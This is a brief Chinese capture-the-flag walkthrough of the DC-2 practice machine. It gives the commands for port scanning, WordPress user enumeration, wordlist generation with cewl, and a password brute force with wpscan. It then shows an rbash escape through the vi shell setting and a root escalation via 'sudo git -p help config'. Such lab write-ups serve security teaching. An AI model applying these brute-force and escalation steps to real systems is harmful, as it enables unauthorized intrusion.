该文章描述了使用KaliLinux进行网络渗透测试的过程,包括对192.168.111.249的端口扫描、WordPress网站的信息收集和漏洞利用,以及通过用户tom和密码parturient登录SSH进行提权。提权方法涉及修改vi编辑器的shell和使用git及GTFOBins工具最终获取root权限。
kali:192.168.111.111
靶机:192.168.111.249
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.249
wpscan收集目标wordpress用户
wpscan --url http://dc-2 -e u
使用cewl收集目标网站信息生成字典
cewl http://dc-2/ -w pass.txt
爆破目标wordpress用户密码
wpscan --url http://dc-2 -U user.txt -P ./pass.txt
提权
使用用户:tom,密码:parturient,登录目标ssh
使用vi编辑器绕过rbash
vi
:set shell=/bin/bash
:shell
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games
切换到jerry用户,密码:adipiscing
jerry用户sudo权限
提权方法:git | GTFOBins
提升为root
sudo -u root git -p help config
!/bin/bash
flag
3640
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
